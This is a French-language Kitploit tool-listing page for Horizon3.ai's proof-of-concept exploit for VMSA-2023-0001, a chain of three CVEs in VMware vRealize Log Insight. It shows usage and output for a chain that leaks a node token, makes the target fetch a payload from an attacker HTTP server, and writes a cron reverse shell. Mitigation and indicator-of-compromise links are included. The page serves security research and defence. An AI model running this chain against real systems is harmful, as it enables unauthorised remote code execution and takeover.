Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
vRealizeLogInsightRCE — POC pour RCE utilisant les vulnérabilités décrites dans VMSA-2023-0001 | Kitploit
Outils/GitHubGitHub/horizon3ai/vrealizeloginsightrce
Génération de PayloadsAnalyse des VulnérabilitésExploitationPost-ExploitationTests d'Intrusion
GitHubhorizon3ai/vrealizeloginsightrce

vRealizeLogInsightRCE

POC pour RCE utilisant les vulnérabilités décrites dans VMSA-2023-0001

Voir le dépôt
1472238il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

VMSA-2023-0001

POC pour VMSA-2023-0001 affectant VMware vRealize Log Insight, qui inclut les CVE suivantes :

  • VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706)
  • VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704)
  • VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)

La configuration par défaut de cette vulnérabilité écrit une tâche cron pour créer un shell inverse. Assurez-vous de modifier le fichier payload pour l'adapter à votre environnement.

Analyse technique

Une analyse technique de la cause racine de la vulnérabilité est disponible sur notre blog : https://www.horizon3.ai/vmware-vrealize-log-insight-vmsa-2023-0001-technical-deep-dive

Indicateurs de compromission

Pour analyser les instances Log Insight à la recherche d'indicateurs de compromission, consultez notre blog IOC : https://www.horizon3.ai/vmware-vrealize-cve-2022-31706-iocs/

Résumé

Ce POC abuse des différents points de terminaison RPC Thrift pour réaliser une écriture de fichier arbitraire.

Utilisation

root@kitploit:~
$ python3 VMSA-2023-0001.py --target_address 192.168.4.133 --http_server_address 192.168.4.60 --http_server_port 8080 --payload_file payload --payload_path /etc/cron.d/exploit 
[+] Using CVE-2022-31711 to leak node token
[+] Found node token: f261d2f5-71fa-45fd-a0a0-6114a55a8fb8
[+] Using CVE-2022-31704 to trigger malicious file download
192.168.4.133 - - [30/Jan/2023 16:43:41] "GET /exploit.tar HTTP/1.1" 200 -
[+] File successfully downloaded
[+] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell
[+] Payload successfully delivered

Dépannage

Si vous utilisez un payload basé sur cron, assurez-vous que le fichier payload a les permissions et le propriétaire appropriés :

root@kitploit:~
sudo chown root:root payload
root@kitploit:~
sudo chmod 0644 payload 

Mesures d'atténuation

Mettez à jour vers la dernière version ou atténuez le risque en suivant les instructions du VMSA https://www.vmware.com/security/advisories/VMSA-2023-0001.html

Suivez l'équipe d'attaque Horizon3.ai sur Twitter pour les dernières recherches en sécurité :

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

Avertissement

Ce logiciel a été créé uniquement à des fins de recherche académique et pour le développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes, sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables de l'utilisation abusive du logiciel. Utilisez-le de manière responsable.

Télécharger l’outil